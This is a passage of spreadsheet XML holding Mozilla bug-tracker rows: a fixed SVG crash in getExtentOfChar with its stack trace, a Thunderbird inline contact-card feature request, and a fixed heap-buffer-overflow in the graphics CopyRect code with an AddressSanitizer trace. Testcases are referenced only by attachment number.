      <c r="X6460" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6461">
      <c r="A6461" t="n">
        <v>590291</v>
      </c>
      <c r="B6461" t="inlineStr">
        <is>
          <t>2010-08-24 13:44:40 -0700</t>
        </is>
      </c>
      <c r="C6461" t="inlineStr">
        <is>
          <t>Crash [@ nsSVGGlyphFrame::GetExtentOfChar] with getExtentOfChar(0)</t>
        </is>
      </c>
      <c r="D6461" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:51 -0700</t>
        </is>
      </c>
      <c r="E6461" t="n">
        <v>1</v>
      </c>
      <c r="F6461" t="n">
        <v>1</v>
      </c>
      <c r="G6461" t="n">
        <v>3</v>
      </c>
      <c r="H6461" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6461" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6461" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K6461" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6461" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6461" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6461" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6461" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6461" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q6461" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6461" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6461" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6461" t="n">
        <v>1</v>
      </c>
      <c r="U6461" t="n">
        <v>0</v>
      </c>
      <c r="V6461" t="n">
        <v>17</v>
      </c>
      <c r="W6461" t="inlineStr">
        <is>
          <t>Created attachment 468796
testcase
See testcase, which crashes current trunk build and Firefox3.6.8.
http://crash-stats.mozilla.com/report/index/bp-c88327df-4ec8-4970-8c25-fe09d2100824
0  	xul.dll  	nsSVGGlyphFrame::GetExtentOfChar  	 layout/svg/base/src/nsSVGGlyphFrame.cpp:1077
1 	xul.dll 	nsSVGTextContainerFrame::GetExtentOfChar 	layout/svg/base/src/nsSVGTextContainerFrame.cpp:195
2 	xul.dll 	nsSVGTextElement::GetExtentOfChar 	content/svg/content/src/nsSVGTextElement.cpp:324
3 	xul.dll 	NS_InvokeByIndex_P 	xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:102
4 	xul.dll 	js::InvokeCommon&lt;int &gt; 	js/src/jsinterp.cpp:566
5 	xul.dll 	js::Invoke 	js/src/jsinterp.cpp:699
6 	xul.dll 	js::Interpret 	js/src/jsinterp.cpp:4709
7 	xul.dll 	js::Execute 	js/src/jsinterp.cpp:883
8 	xul.dll 	JS_EvaluateUCScriptForPrincipals 	js/src/jsapi.cpp:4769
9 	xul.dll 	nsJSContext::EvaluateString 	dom/base/nsJSEnvironment.cpp:1811
10 	xul.dll 	nsScriptLoader::EvaluateScript 	content/base/src/nsScriptLoader.cpp:767
11 	xul.dll 	nsScriptLoader::ProcessRequest 	content/base/src/nsScriptLoader.cpp:677
12 	xul.dll 	nsScriptLoader::ProcessScriptElement 	content/base/src/nsScriptLoader.cpp:617
13 	xul.dll 	nsScriptElement::MaybeProcessScript 	content/base/src/nsScriptElement.cpp:195
14 	xul.dll 	nsSVGScriptElement::DoneAddingChildren 	content/svg/content/src/nsSVGScriptElement.cpp:280
15 	xul.dll 	nsXMLContentSink::CloseElement 	
etc..</t>
        </is>
      </c>
      <c r="X6461" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6462">
      <c r="A6462" t="n">
        <v>450724</v>
      </c>
      <c r="B6462" t="inlineStr">
        <is>
          <t>2008-08-15 01:51:00 -0700</t>
        </is>
      </c>
      <c r="C6462" t="inlineStr">
        <is>
          <t>Implement New/Edit Card inline features for message header display</t>
        </is>
      </c>
      <c r="D6462" t="inlineStr">
        <is>
          <t>2009-11-14 20:52:39 -0800</t>
        </is>
      </c>
      <c r="E6462" t="n">
        <v>1</v>
      </c>
      <c r="F6462" t="n">
        <v>1</v>
      </c>
      <c r="G6462" t="n">
        <v>2</v>
      </c>
      <c r="H6462" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6462" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J6462" t="inlineStr">
        <is>
          <t>Mail Window Front End</t>
        </is>
      </c>
      <c r="K6462" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6462" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6462" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6462" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6462" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6462" t="inlineStr"/>
      <c r="Q6462" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6462" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6462" t="inlineStr">
        <is>
          <t>Thunderbird 3.0a3</t>
        </is>
      </c>
      <c r="T6462" t="n">
        <v>1</v>
      </c>
      <c r="U6462" t="n">
        <v>0</v>
      </c>
      <c r="V6462" t="n">
        <v>86</v>
      </c>
      <c r="W6462" t="inlineStr">
        <is>
          <t>This bug is for implementing the new features for new/edit card inline on the message header display (see URL).
See web page for details. Some of the work will be done on this bug, some may be moved out to other bugs.</t>
        </is>
      </c>
      <c r="X6462" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6463">
      <c r="A6463" t="n">
        <v>1117304</v>
      </c>
      <c r="B6463" t="inlineStr">
        <is>
          <t>2015-01-02 22:48:37 -0800</t>
        </is>
      </c>
      <c r="C6463" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow write in mozilla::gfx::CopyRect</t>
        </is>
      </c>
      <c r="D6463" t="inlineStr">
        <is>
          <t>2024-09-16 13:26:02 -0700</t>
        </is>
      </c>
      <c r="E6463" t="n">
        <v>1</v>
      </c>
      <c r="F6463" t="n">
        <v>1</v>
      </c>
      <c r="G6463" t="n">
        <v>3</v>
      </c>
      <c r="H6463" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6463" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6463" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6463" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6463" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6463" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6463" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6463" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6463" t="inlineStr">
        <is>
          <t>[adv-main36+][adv-esr31.5+]</t>
        </is>
      </c>
      <c r="Q6463" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6463" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6463" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T6463" t="n">
        <v>1</v>
      </c>
      <c r="U6463" t="n">
        <v>0</v>
      </c>
      <c r="V6463" t="n">
        <v>24</v>
      </c>
      <c r="W6463" t="inlineStr">
        <is>
          <t>Created attachment 8543484
Testcase
=================================================================
==16794==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f398b43d56f at pc 0x7f39a2568a2d bp 0x7fff0e98b4a0 sp 0x7fff0e98b498
WRITE of size 16 at 0x7f398b43d56f thread T0 (Web Content)
    #0 0x7f39a2568a2c in mozilla::gfx::CopyRect(mozilla::gfx::DataSourceSurface*, mozilla::gfx::DataSourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::gfx::IntPointTyped&lt;mozilla::gfx::UnknownUnits&gt;) objdir-ff-asan/dist/include/mozilla/PodOperations.h:87:3
    #1 0x7f39a25b3559 in mozilla::gfx::FilterNodeTileSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:1552:7
    #2 0x7f39a25a2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:604:21
    #3 0x7f39a25a8710 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) gfx/2d/FilterNodeSoftware.cpp:698:17
    #4 0x7f39a25c985d in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:3004:10
    #5 0x7f39a25a2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:604:21
    #6 0x7f39a25a8710 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) gfx/2d/FilterNodeSoftware.cpp:698:17
    #7 0x7f39a25ca1d9 in mozilla::gfx::FilterNodeUnpremultiplySoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:3061:5
    #8 0x7f39a25a2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:604:21
    #9 0x7f39a25a8710 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) gfx/2d/FilterNodeSoftware.cpp:698:17
    #10 0x7f39a25b4e8f in mozilla::gfx::FilterNodeComponentTransferSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:1680:5
    #11 0x7f39a25a2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:604:21
    #12 0x7f39a25a8710 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) gfx/2d/FilterNodeSoftware.cpp:698:17
    #13 0x7f39a25c9fd9 in mozilla::gfx::FilterNodePremultiplySoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:3032:5
    #14 0x7f39a25a2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:604:21
    #15 0x7f39a256dbba in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::DrawOptions const&amp;) gfx/2d/FilterNodeSoftware.cpp:557:14
    #16 0x7f39a2630f76 in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, nsTArray&lt;mozilla::RefPtr&lt;mozilla::gfx::SourceSurface&gt; &gt;&amp;, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::DrawOptions const&amp;) gfx/src/FilterSupport.cpp:1249:3
    #17 0x7f39a65b77e5 in nsFilterInstance::Render(gfxContext*) layout/svg/nsFilterInstance.cpp:486:3
    #18 0x7f39a65b6c66 in nsFilterInstance::PaintFilteredFrame(nsIFrame*, gfxContext&amp;, gfxMatrix const&amp;, nsSVGFilterPaintCallback*, nsRegion const*) layout/svg/nsFilterInstance.cpp:74:10
    #19 0x7f39a65eee5d in nsSVGIntegrationUtils::PaintFramesWithEffects(gfxContext&amp;, nsIFrame*, nsRect const&amp;, nsDisplayListBuilder*, mozilla::layers::LayerManager*) layout/svg/nsSVGIntegrationUtils.cpp:543:5
    #20 0x7f39a5fca1ee in mozilla::FrameLayerBuilder::PaintItems(nsTArray&lt;mozilla::FrameLayerBuilder::ClippedDisplayItem&gt;&amp;, nsIntRect const&amp;, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, nsIntPoint const&amp;, float, float, int) layout/base/FrameLayerBuilder.cpp:2665:5
    #21 0x7f39a5fccee1 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*) layout/base/FrameLayerBuilder.cpp:4630:5
    #22 0x7f39a27a7600 in mozilla::layers::BasicPaintedLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*) gfx/layers/basic/BasicPaintedLayer.cpp:94:7
    #23 0x7f39a27a2b09 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintLayerContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:724:7
    #24 0x7f39a279fe87 in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*) gfx/layers/basic/BasicLayerManager.cpp:838:5
    #25 0x7f39a27a2925 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintLayerContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:737:7
    #26 0x7f39a279fe87 in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*) gfx/layers/basic/BasicLayerManager.cpp:838:5
    #27 0x7f39a279b3ca in mozilla::layers::BasicLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/basic/BasicLayerManager.cpp:528:5
    #28 0x7f39a5fca23a in mozilla::FrameLayerBuilder::PaintItems(nsTArray&lt;mozilla::FrameLayerBuilder::ClippedDisplayItem&gt;&amp;, nsIntRect const&amp;, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, nsIntPoint const&amp;, float, float, int) layout/base/FrameLayerBuilder.cpp:2670:5
    #29 0x7f39a5fccee1 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*) layout/base/FrameLayerBuilder.cpp:4630:5
    #30 0x7f39a27b7204 in mozilla::layers::ClientPaintedLayer::PaintThebes() gfx/layers/client/ClientPaintedLayer.cpp:76:5
    #31 0x7f39a27b7c98 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) gfx/layers/client/ClientPaintedLayer.cpp:131:3
    #32 0x7f39a27d3227 in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:69:7
    #33 0x7f39a27b270b in mozilla::layers::ClientLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/client/ClientLayerManager.cpp:268:3
    #34 0x7f39a27b2d9b in mozilla::layers::ClientLayerManager::EndTransaction(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/client/ClientLayerManager.cpp:303:3
    #35 0x7f39a60e92e1 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) layout/base/nsDisplayList.cpp:1642:3
    #36 0x7f39a616bf0e in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int) layout/base/nsLayoutUtils.cpp:3177:5
    #37 0x7f39a61ef845 in PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int) layout/base/nsPresShell.cpp:6345:5
    #38 0x7f39a5957292 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) view/nsViewManager.cpp:443:7
    #39 0x7f39a5956ade in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) view/nsViewManager.cpp:384:9
    #40 0x7f39a5f814d7 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:1386:5
    #41 0x7f39a5f874d6 in mozilla::RefreshDriverTimer::Tick() layout/base/nsRefreshDriver.cpp:177:5
    #42 0x7f39a0efe325 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:631:7
    #43 0x7f39a0efefc0 in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:724:3
    #44 0x7f39a0ef4f36 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:855:7
    #45 0x7f39a0f4be16 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:265:10
    #46 0x7f39a1775aaf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:99:21
    #47 0x7f39a1726de1 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:233:3
    #48 0x7f39a59890ff in nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:164:3
    #49 0x7f39a74454d2 in XRE_RunAppShell toolkit/xre/nsEmbedFunctions.cpp:734:12
    #50 0x7f39a1726de1 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:233:3
    #51 0x7f39a744490b in XRE_InitChildProcess toolkit/xre/nsEmbedFunctions.cpp:571:7
    #52 0x4bbc7e in content_process_main(int, char**) ipc/contentproc/plugin-container.cpp:211:19
    #53 0x7f399e55eec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
0x7f398b43d56f is located 0 bytes to the right of 589167-byte region [0x7f398b3ad800,0x7f398b43d56f)
allocated by thread T0 (Web Content) here:
    #0 0x499a39 in __interceptor_malloc _asan_rtl_
    #1 0x7f39a261cb16 in mozilla::gfx::SourceSurfaceAlignedRawData::Init(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat, bool) gfx/2d/Tools.h:160:41
    #2 0x7f39a256924a in mozilla::gfx::Factory::CreateDataSourceSurface(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SurfaceFormat, bool) gfx/2d/Factory.cpp:807:7
    #3 0x7f39a25b3435 in mozilla::gfx::FilterNodeTileSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:1545:18
    #4 0x7f39a25a2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:604:21
    #5 0x7f39a25a8710 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) gfx/2d/FilterNodeSoftware.cpp:698:17
    #6 0x7f39a25c985d in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:3004:10
    #7 0x7f39a25a2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:604:21
    #8 0x7f39a25a8710 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) gfx/2d/FilterNodeSoftware.cpp:698:17
    #9 0x7f39a25ca1d9 in mozilla::gfx::FilterNodeUnpremultiplySoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:3061:5
    #10 0x7f39a25a2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:604:21
    #11 0x7f39a25a8710 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) gfx/2d/FilterNodeSoftware.cpp:698:17
    #12 0x7f39a25b4e8f in mozilla::gfx::FilterNodeComponentTransferSoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:1680:5
    #13 0x7f39a25a2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:604:21
    #14 0x7f39a25a8710 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) gfx/2d/FilterNodeSoftware.cpp:698:17
    #15 0x7f39a25c9fd9 in mozilla::gfx::FilterNodePremultiplySoftware::Render(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:3032:5
    #16 0x7f39a25a2f6a in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) gfx/2d/FilterNodeSoftware.cpp:604:21
    #17 0x7f39a256dbba in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::DrawOptions const&amp;) gfx/2d/FilterNodeSoftware.cpp:557:14
    #18 0x7f39a2630f76 in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&amp;, mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, nsTArray&lt;mozilla::RefPtr&lt;mozilla::gfx::SourceSurface&gt; &gt;&amp;, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::DrawOptions const&amp;) gfx/src/FilterSupport.cpp:1249:3
    #19 0x7f39a65b77e5 in nsFilterInstance::Render(gfxContext*) layout/svg/nsFilterInstance.cpp:486:3
    #20 0x7f39a65b6c66 in nsFilterInstance::PaintFilteredFrame(nsIFrame*, gfxContext&amp;, gfxMatrix const&amp;, nsSVGFilterPaintCallback*, nsRegion const*) layout/svg/nsFilterInstance.cpp:74:10
    #21 0x7f39a65eee5d in nsSVGIntegrationUtils::PaintFramesWithEffects(gfxContext&amp;, nsIFrame*, nsRect const&amp;, nsDisplayListBuilder*, mozilla::layers::LayerManager*) layout/svg/nsSVGIntegrationUtils.cpp:543:5
    #22 0x7f39a5fca1ee in mozilla::FrameLayerBuilder::PaintItems(nsTArray&lt;mozilla::FrameLayerBuilder::ClippedDisplayItem&gt;&amp;, nsIntRect const&amp;, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, nsIntPoint const&amp;, float, float, int) layout/base/FrameLayerBuilder.cpp:2665:5
    #23 0x7f39a5fccee1 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*) layout/base/FrameLayerBuilder.cpp:4630:5
    #24 0x7f39a27a7600 in mozilla::layers::BasicPaintedLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*) gfx/layers/basic/BasicPaintedLayer.cpp:94:7
    #25 0x7f39a27a2b09 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintLayerContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:724:7
    #26 0x7f39a279fe87 in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*) gfx/layers/basic/BasicLayerManager.cpp:838:5
    #27 0x7f39a27a2925 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintLayerContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:737:7
    #28 0x7f39a279fe87 in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*) gfx/layers/basic/BasicLayerManager.cpp:838:5
    #29 0x7f39a279b3ca in mozilla::layers::BasicLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/basic/BasicLayerManager.cpp:528:5
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
